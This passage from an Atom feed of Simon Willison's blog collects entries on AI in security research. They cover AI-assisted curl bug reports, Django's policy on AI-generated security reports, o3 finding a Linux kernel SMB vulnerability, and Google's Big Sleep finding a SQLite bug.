    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/thomas-ptacek"&gt;thomas-ptacek&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/anthropic"&gt;anthropic&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude"&gt;claude&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/open-source"&gt;open-source&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-security-research"&gt;ai-security-research&lt;/a&gt;&lt;/p&gt;



</summary><category term="thomas-ptacek"/><category term="anthropic"/><category term="claude"/><category term="security"/><category term="generative-ai"/><category term="ai"/><category term="llms"/><category term="open-source"/><category term="ai-security-research"/></entry><entry><title>Daniel Stenberg's note on AI assisted curl bug reports</title><link href="https://simonwillison.net/2025/Oct/2/curl/#atom-tag" rel="alternate"/><published>2025-10-02T15:00:09+00:00</published><updated>2025-10-02T15:00:09+00:00</updated><id>https://simonwillison.net/2025/Oct/2/curl/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://mastodon.social/@bagder/115241241075258997"&gt;Daniel Stenberg&amp;#x27;s note on AI assisted curl bug reports&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Curl maintainer Daniel Stenberg on Mastodon:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Joshua Rogers sent us a &lt;em&gt;massive&lt;/em&gt; list of potential issues in #curl that he found using his set of AI assisted tools. Code analyzer style nits all over. Mostly smaller bugs, but still bugs and there could be one or two actual security flaws in there. Actually truly awesome findings.&lt;/p&gt;
&lt;p&gt;I have already landed 22(!) bugfixes thanks to this, and I have over twice that amount of issues left to go through. Wade through perhaps.&lt;/p&gt;
&lt;p&gt;Credited "Reported in Joshua's sarif data" if you want to look for yourself&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I searched for &lt;code&gt;is:pr Joshua sarif data is:closed&lt;/code&gt; in the &lt;code&gt;curl&lt;/code&gt; GitHub repository &lt;a href="https://github.com/curl/curl/pulls?q=is%3Apr+Joshua+sarif+data+is%3Aclosed"&gt;and found 49 completed PRs so far&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Joshua's own post about this: &lt;a href="https://joshua.hu/llm-engineer-review-sast-security-ai-tools-pentesters"&gt;Hacking with AI SASTs: An overview of 'AI Security Engineers' / 'LLM Security Scanners' for Penetration Testers and Security Teams&lt;/a&gt;. The &lt;a href="https://joshua.hu/files/AI_SAST_PRESENTATION.pdf"&gt;accompanying presentation PDF&lt;/a&gt; includes screenshots of some of the tools he used, which included Almanax, Amplify Security, Corgea, Gecko Security, and ZeroPath. Here's his vendor summary:&lt;/p&gt;
&lt;p&gt;&lt;img alt="Screenshot of a presentation slide titled &amp;quot;General Results&amp;quot; with &amp;quot;RACEDAY&amp;quot; in top right corner. Three columns compare security tools: &amp;quot;Almanax&amp;quot; - Excellent single-function &amp;quot;obvious&amp;quot; results. Not so good at large/complicated code. Great at simple malicious code detection. Raw-bones solutions, not yet a mature product. &amp;quot;Gorgoa&amp;quot; - Discovered nearly all &amp;quot;test-case&amp;quot; issues. Discovered real vulns in big codebases. Tons of F/Ps. Malicious detection sucks. Excellent UI &amp;amp; reports. Tons of bugs in UI. PR reviews failed hard. &amp;quot;ZeroPath&amp;quot; - Discovered all &amp;quot;test-case&amp;quot; issues. Intimidatingly good bug and vuln findings. Excellent PR scanning. In-built issue chatbot. Even better with policies. Extremely slow UI. Complex issuedescriptions." src="https://static.simonwillison.net/static/2025/security-vendor-slide.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;This result is especially notable because Daniel has been outspoken about the deluge of junk AI-assisted reports on "security issues" that curl has received in the past. In &lt;a href="https://simonwillison.net/2025/May/6/daniel-stenberg/"&gt;May this year&lt;/a&gt;, concerning HackerOne:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;We now ban every reporter INSTANTLY who submits reports we deem AI slop. A threshold has been reached. We are effectively being DDoSed. If we could, we would charge them for this waste of our time.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;He also wrote about this &lt;a href="https://daniel.haxx.se/blog/2024/01/02/the-i-in-llm-stands-for-intelligence/"&gt;in January 2024&lt;/a&gt;, where he included this note:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;I do however suspect that if you just add an ever so tiny (intelligent) human check to the mix, the use and outcome of any such tools will become so much better. I suspect that will be true for a long time into the future as well.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This is yet another illustration of how much more interesting these tools are when experienced professionals use them to augment their existing skills.

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://news.ycombinator.com/item?id=45449348"&gt;Hacker News&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/curl"&gt;curl&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/daniel-stenberg"&gt;daniel-stenberg&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-assisted-programming"&gt;ai-assisted-programming&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-ethics"&gt;ai-ethics&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-security-research"&gt;ai-security-research&lt;/a&gt;&lt;/p&gt;



</summary><category term="curl"/><category term="security"/><category term="ai"/><category term="generative-ai"/><category term="llms"/><category term="daniel-stenberg"/><category term="ai-assisted-programming"/><category term="ai-ethics"/><category term="ai-security-research"/></entry><entry><title>Quoting Django’s security policies</title><link href="https://simonwillison.net/2025/Jul/11/django-security-policies/#atom-tag" rel="alternate"/><published>2025-07-11T16:51:08+00:00</published><updated>2025-07-11T16:51:08+00:00</updated><id>https://simonwillison.net/2025/Jul/11/django-security-policies/#atom-tag</id><summary type="html">
    &lt;blockquote cite="https://docs.djangoproject.com/en/dev/internals/security/#ai-assisted-reports"&gt;&lt;p&gt;Following the widespread availability of large language models (LLMs), the Django Security Team has received a growing number of security reports generated partially or entirely using such tools. Many of these contain inaccurate, misleading, or fictitious content. While AI tools can help draft or analyze reports, they must not replace human understanding and review.&lt;/p&gt;
&lt;p&gt;If you use AI tools to help prepare a report, you must:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Disclose&lt;/strong&gt; which AI tools were used and specify what they were used for (analysis, writing the description, writing the exploit, etc).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Verify&lt;/strong&gt; that the issue describes a real, reproducible vulnerability that otherwise meets these reporting guidelines.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Avoid&lt;/strong&gt; fabricated code, placeholder text, or references to non-existent Django features.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Reports that appear to be unverified AI output will be closed without response. Repeated low-quality submissions may result in a ban from future reporting&lt;/p&gt;&lt;/blockquote&gt;
&lt;p class="cite"&gt;&amp;mdash; &lt;a href="https://docs.djangoproject.com/en/dev/internals/security/#ai-assisted-reports"&gt;Django’s security policies&lt;/a&gt;, on AI-Assisted Reports&lt;/p&gt;

    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/ai-misuse"&gt;ai-misuse&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-ethics"&gt;ai-ethics&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/open-source"&gt;open-source&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/django"&gt;django&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-security-research"&gt;ai-security-research&lt;/a&gt;&lt;/p&gt;



</summary><category term="ai-misuse"/><category term="ai-ethics"/><category term="open-source"/><category term="security"/><category term="generative-ai"/><category term="ai"/><category term="django"/><category term="llms"/><category term="ai-security-research"/></entry><entry><title>How I used o3 to find CVE-2025-37899, a remote zeroday vulnerability in the Linux kernel’s SMB implementation</title><link href="https://simonwillison.net/2025/May/24/sean-heelan/#atom-tag" rel="alternate"/><published>2025-05-24T21:09:40+00:00</published><updated>2025-05-24T21:09:40+00:00</updated><id>https://simonwillison.net/2025/May/24/sean-heelan/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://sean.heelan.io/2025/05/22/how-i-used-o3-to-find-cve-2025-37899-a-remote-zeroday-vulnerability-in-the-linux-kernels-smb-implementation/"&gt;How I used o3 to find CVE-2025-37899, a remote zeroday vulnerability in the Linux kernel’s SMB implementation&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Sean Heelan:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The vulnerability [o3] found is CVE-2025-37899 (fix &lt;a href="https://github.com/torvalds/linux/commit/2fc9feff45d92a92cd5f96487655d5be23fb7e2b"&gt;here&lt;/a&gt;), a use-after-free in the handler for the SMB 'logoff' command. Understanding the vulnerability requires reasoning about concurrent connections to the server, and how they may share various objects in specific circumstances. o3 was able to comprehend this and spot a location where a particular object that is not referenced counted is freed while still being accessible by another thread. As far as I'm aware, this is the first public discussion of a vulnerability of that nature being found by a LLM.&lt;/p&gt;
&lt;p&gt;Before I get into the technical details, the main takeaway from this post is this: with o3 LLMs have made a leap forward in their ability to reason about code, and if you work in vulnerability research you should start paying close attention. If you're an expert-level vulnerability researcher or exploit developer the machines aren't about to replace you. In fact, it is quite the opposite: they are now at a stage where they can make you &lt;em&gt;significantly&lt;/em&gt; more efficient and effective. If you have a problem that can be represented in fewer than 10k lines of code there is a reasonable chance o3 can either solve it, or help you solve it.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Sean used my &lt;a href="https://llm.datasette.io/"&gt;LLM&lt;/a&gt; tool to help find the bug! He ran it against the prompts he shared &lt;a href="https://github.com/SeanHeelan/o3_finds_cve-2025-37899"&gt;in this GitHub repo&lt;/a&gt; using the following command:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;llm --sf system_prompt_uafs.prompt              \ 
    -f session_setup_code.prompt                \          
    -f ksmbd_explainer.prompt                   \
    -f session_setup_context_explainer.prompt   \
    -f audit_request.prompt
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Sean ran the same prompt 100 times, so I'm glad he was using the new, more efficient &lt;a href="https://simonwillison.net/2025/Apr/7/long-context-llm/#improving-llm-s-support-for-long-context-models"&gt;fragments mechanism&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;o3 found his first, known vulnerability 8/100 times - but found the brand new one in just 1 out of the 100 runs it performed with a larger context.&lt;/p&gt;
&lt;p&gt;I thoroughly enjoyed this snippet which perfectly captures how I feel when I'm iterating on prompts myself:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;In fact my entire system prompt is speculative in that I haven’t ran a sufficient number of evaluations to determine if it helps or hinders, so consider it equivalent to me saying a prayer, rather than anything resembling science or engineering.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Sean's conclusion with respect to the utility of these models for security research:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;If we were to never progress beyond what o3 can do right now, it would still make sense for everyone working in VR [Vulnerability Research] to figure out what parts of their work-flow will benefit from it, and to build the tooling to wire it in. Of course, part of that wiring will be figuring out how to deal with the the signal to noise ratio of ~1:50 in this case, but that’s something we are already making progress at.&lt;/p&gt;
&lt;/blockquote&gt;

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://news.ycombinator.com/item?id=44081338"&gt;Hacker News&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/openai"&gt;openai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llm"&gt;llm&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llm-reasoning"&gt;llm-reasoning&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/o3"&gt;o3&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/system-prompts"&gt;system-prompts&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-security-research"&gt;ai-security-research&lt;/a&gt;&lt;/p&gt;



</summary><category term="security"/><category term="ai"/><category term="openai"/><category term="generative-ai"/><category term="llms"/><category term="llm"/><category term="llm-reasoning"/><category term="o3"/><category term="system-prompts"/><category term="ai-security-research"/></entry><entry><title>Quoting Daniel Stenberg</title><link href="https://simonwillison.net/2025/May/6/daniel-stenberg/#atom-tag" rel="alternate"/><published>2025-05-06T15:12:17+00:00</published><updated>2025-05-06T15:12:17+00:00</updated><id>https://simonwillison.net/2025/May/6/daniel-stenberg/#atom-tag</id><summary type="html">
    &lt;blockquote cite="https://www.linkedin.com/posts/danielstenberg_hackerone-curl-activity-7324820893862363136-glb1"&gt;&lt;p&gt;That's it. I've had it. I'm putting my foot down on this craziness.&lt;/p&gt;
&lt;p&gt;1. Every reporter submitting security reports on #Hackerone for #curl now needs to answer this question:&lt;/p&gt;

&lt;p&gt;"Did you use an AI to find the problem or generate this submission?"&lt;/p&gt;
&lt;p&gt;(and if they do select it, they can expect a stream of proof of actual intelligence follow-up questions)&lt;/p&gt;
&lt;p&gt;2. We now ban every reporter INSTANTLY who submits reports we deem AI slop. A threshold has been reached. We are effectively being DDoSed. If we could, we would charge them for this waste of our time.&lt;/p&gt;

&lt;p&gt;We still have not seen a single valid security report done with AI help.&lt;/p&gt;&lt;/blockquote&gt;
&lt;p class="cite"&gt;&amp;mdash; &lt;a href="https://www.linkedin.com/posts/danielstenberg_hackerone-curl-activity-7324820893862363136-glb1"&gt;Daniel Stenberg&lt;/a&gt;&lt;/p&gt;

    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/ai-misuse"&gt;ai-misuse&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-ethics"&gt;ai-ethics&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/daniel-stenberg"&gt;daniel-stenberg&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/slop"&gt;slop&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/curl"&gt;curl&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-security-research"&gt;ai-security-research&lt;/a&gt;&lt;/p&gt;



</summary><category term="ai-misuse"/><category term="ai"/><category term="llms"/><category term="ai-ethics"/><category term="daniel-stenberg"/><category term="slop"/><category term="security"/><category term="curl"/><category term="generative-ai"/><category term="ai-security-research"/></entry><entry><title>From Naptime to Big Sleep: Using Large Language Models To Catch Vulnerabilities In Real-World Code</title><link href="https://simonwillison.net/2024/Nov/1/from-naptime-to-big-sleep/#atom-tag" rel="alternate"/><published>2024-11-01T20:15:39+00:00</published><updated>2024-11-01T20:15:39+00:00</updated><id>https://simonwillison.net/2024/Nov/1/from-naptime-to-big-sleep/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://googleprojectzero.blogspot.com/2024/10/from-naptime-to-big-sleep.html"&gt;From Naptime to Big Sleep: Using Large Language Models To Catch Vulnerabilities In Real-World Code&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Google's &lt;a href="https://en.wikipedia.org/wiki/Project_Zero"&gt;Project Zero&lt;/a&gt; security team used a system based around Gemini 1.5 Pro to find a previously unreported security vulnerability in SQLite (a stack buffer underflow), in time for it to be fixed prior to making it into a release.&lt;/p&gt;
&lt;p&gt;A key insight here is that LLMs are well suited for checking for new variants of previously reported vulnerabilities:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;A key motivating factor for Naptime and now for Big Sleep has been the continued in-the-wild discovery of exploits for variants of previously found and patched vulnerabilities. As this trend continues, it's clear that fuzzing is not succeeding at catching such variants, and that for attackers, manual variant analysis is a cost-effective approach.&lt;/p&gt;
&lt;p&gt;We also feel that this variant-analysis task is a better fit for current LLMs than the more general open-ended vulnerability research problem. By providing a starting point – such as the details of a previously fixed vulnerability – we remove a lot of ambiguity from vulnerability research, and start from a concrete, well-founded theory: "This was a previous bug; there is probably another similar one somewhere".&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;LLMs are great at pattern matching. It turns out feeding in a pattern describing a prior vulnerability is a great way to identify potential new ones.

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://news.ycombinator.com/item?id=42017771"&gt;Hacker News&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/google"&gt;google&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/prompt-engineering"&gt;prompt-engineering&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/gemini"&gt;gemini&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-security-research"&gt;ai-security-research&lt;/a&gt;&lt;/p&gt;



</summary><category term="google"/><category term="security"/><category term="sqlite"/><category term="ai"/><category term="prompt-engineering"/><category term="generative-ai"/><category term="llms"/><category term="gemini"/><category term="ai-security-research"/></entry></feed>